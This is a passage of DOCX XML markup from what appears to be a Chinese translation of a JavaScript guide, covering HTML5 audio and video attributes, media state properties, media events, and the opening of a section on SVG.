      <w:r>
        <w:t>表示显示控件，反之表示隐藏控件。</w:t>
      </w:r>
      <w:r>
        <w:t>loop</w:t>
      </w:r>
      <w:r>
        <w:t>属性是布尔类型，它指定媒体是否需要循环播放，</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>表示需要循环播放，</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>则表示播放到最后就停止。</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定在用户开始播放媒体前，是否或者多少媒体内容需要预加载。该属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>则表示</w:t>
      </w:r>
      <w:r>
        <w:t>不需要预加载数据。为</w:t>
      </w:r>
      <w:r>
        <w:t>"metadata"</w:t>
      </w:r>
      <w:r>
        <w:t>则表示诸如时长、比特率、帧大小这样的元数据而不是媒体内容需要加载。其实，在不设置</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>属性的情况下，浏览器默认也会加载这些元数据的。</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>属性值如果为</w:t>
      </w:r>
      <w:r>
        <w:t>"auto"</w:t>
      </w:r>
      <w:r>
        <w:t>则表示浏览器应当预加载它认为适量的媒体内容。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>autoplay</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定当已经缓存足够多的媒体内容时是否需要自动开始播放。将该属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>就等于是告诉浏览器需要预加载媒体内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="527" w:name="21_2_3_Cha_Xun_Mei_Ti_Zhuang_Tai_"/>
      <w:r>
        <w:t>21.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　查询媒体状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有一些只读属性，描述媒体以及播放器当前的状</w:t>
      </w:r>
      <w:r>
        <w:t>态：如果播放器暂停，那么</w:t>
      </w:r>
      <w:r>
        <w:t>paused</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值就为</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果播放器正在跳到一个新的播放点，那么</w:t>
      </w:r>
      <w:r>
        <w:t>seeking</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值就为</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果播放器播放完媒体并且停下来，那么</w:t>
      </w:r>
      <w:r>
        <w:t>ended</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值就为</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>（如果设置</w:t>
      </w:r>
      <w:r>
        <w:t>loop</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>ended</w:t>
      </w:r>
      <w:r>
        <w:t>属性值永远不为</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了媒体的时长，单位是秒。如果在媒体元数据还未载入前查询该属性，它会返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。对于像</w:t>
      </w:r>
      <w:r>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:t>广播这样有无限时长的流媒体而言，该属性会返回</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>initialTime</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了</w:t>
      </w:r>
      <w:r>
        <w:t>媒体的开始时间，单位也是秒。对于固定时长的媒体剪辑而言，该属性值通常是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。而对于流媒体而言，该属性表示已经缓存的数据的最早时间以及能够回退到的最早时间。当设置</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，其值不能小于</w:t>
      </w:r>
      <w:r>
        <w:t>initialTime</w:t>
      </w:r>
      <w:r>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其他三个属性分别指定包含媒体时间轴、播放和缓冲状态的较细粒度视图。</w:t>
      </w:r>
      <w:r>
        <w:t>played</w:t>
      </w:r>
      <w:r>
        <w:t>属性返回已经播放的时间段。</w:t>
      </w:r>
      <w:r>
        <w:t>buffered</w:t>
      </w:r>
      <w:r>
        <w:t>属性返回当前已经缓冲的时间段，</w:t>
      </w:r>
      <w:r>
        <w:t>seekable</w:t>
      </w:r>
      <w:r>
        <w:t>属性则返回当前播放器需要跳到的时间段。（可以使用这些属性来实现一个进度条，显示</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>duratio</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>以及媒体的播放量和缓冲量。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>played</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>buffered</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>seekable</w:t>
      </w:r>
      <w:r>
        <w:t>都是</w:t>
      </w:r>
      <w:r>
        <w:t>TimeRanges</w:t>
      </w:r>
      <w:r>
        <w:t>对象。每个对象都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性以及</w:t>
      </w:r>
      <w:r>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，前者表示当前的一个时间段，后者分别返回当前时间段的起始时间点和结束时间点（单位都是秒）。对于一段常见的连续时间段来说，一般使用</w:t>
      </w:r>
      <w:r>
        <w:t>start(0)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>end(0)</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，假设媒体文件从开始缓存起中间没有定点播放发生（跳过一段播放），可以使用如下代码来确定当前缓存内容的百分比：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var percent_loaded=Math.floor(</w:t>
      </w:r>
      <w:r>
        <w:t>song.buffered.end(0)/song.duration*100);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，还有另外三个属性：</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>networkState</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>，它们包含＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素更加底层的一些状态细节。每个属性都是数字类型的，而且为每个有效值都定义了对应的常量。不过要注意的是，这些常量是定义在媒体对象（或者错误对象）上的。可以按照如下方式来使用一个属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(song.readyState===song.HAVE_ENOUGH_DATA)song.play();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定当前已经加载了多少媒体内容，因此同时也暗示着是否已经准备好可以播放了。如下表格展示了该属性的取值以及对应的意义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="1815860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="55" name="00055.jpeg" descr="00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5.jpeg" descr="00055.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="1815860"/>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15584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4110486" cy="970471"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="56" name="00056.jpeg" descr="00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6.jpeg" descr="00056.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4110486" cy="970471"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NetworkState</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定媒体元素是否使用网络或者为什么媒体文件不使用网络</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4067354" cy="1561381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="57" name="00057.jpeg" descr="000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7.jpeg" descr="00057.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067354" cy="1561381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当在加载媒体或者播放媒体过程中发生错误时，浏览器就会设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在没有错误发生的情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。反之，</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>的属性值是一个对象，包含了描述错误的数值</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>属性。同时，</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>对象也定义了一些描述</w:t>
      </w:r>
      <w:r>
        <w:t>可能的错误代码的常量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4136366" cy="1453550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="58" name="00058.jpeg" descr="000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8.jpeg" descr="00058.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4136366" cy="1453550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以以如下方</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>式使用</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(song.error.code==song.error.MEDIA_ERR_DECODE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Can't play song:corrupt audio data.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="528" w:name="21_2_4_Mei_Ti_Xiang_Guan_Shi_Jian_"/>
      <w:r>
        <w:t>21.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　媒体相关事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞都是相对比较复杂的元素</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它们必须不仅要对用户与播放控件的交互作出响应，还要对网络活动做出响应，甚至在播放的时候，对播放时间做出响应。与此同时，正如之前介绍过的，它们还有一些属性来表示它们当前的</w:t>
      </w:r>
      <w:r>
        <w:t>状态。和大多数</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素一样，＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在它们状态发生改变的时候，都会触发一些相应的事件。由于它们的状态比较复杂，因此触发的事件种类也比较多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下表根据它们触发的先后顺序，总结了</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>个媒体相关事件。这些事件不能通过属性来注册事件，只能通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来注册处理程序函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4075981" cy="4166558"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="59" name="00059.jpeg" descr="000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9.jpeg" descr="00059.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4075981" cy="4166558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="2682815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="60" name="00060.jpeg" descr="000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0.jpeg" descr="00060.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="2682815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="529" w:name="21_3_SVG_Ke_Shen_Suo_De_Shi_Liang_Tu_Xin"/>
      <w:r>
        <w:t>21.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>：可伸缩的矢量图形</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>是一种用于描述图形的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>语法。顾名思义，其中</w:t>
      </w:r>
      <w:r>
        <w:t>"vector"</w:t>
      </w:r>
      <w:r>
        <w:t>一词表示它完全不同于光栅图像格式，诸如</w:t>
      </w:r>
      <w:r>
        <w:t>GIF</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>JPEG</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>PNG</w:t>
      </w:r>
      <w:r>
        <w:t>（用像素值来描绘的矩阵）。一个</w:t>
      </w:r>
      <w:r>
        <w:t>"SVG"</w:t>
      </w:r>
      <w:r>
        <w:t>图形是对画该图形时的必要路径的一种精准、分辨率无关（因此是可伸缩的）的描述。一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>文件如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形一开始声明命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>svg xmlns="http://www.w3.org/2000/svg"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>viewBox="0 0 1000 1000"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>图形的坐标系</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
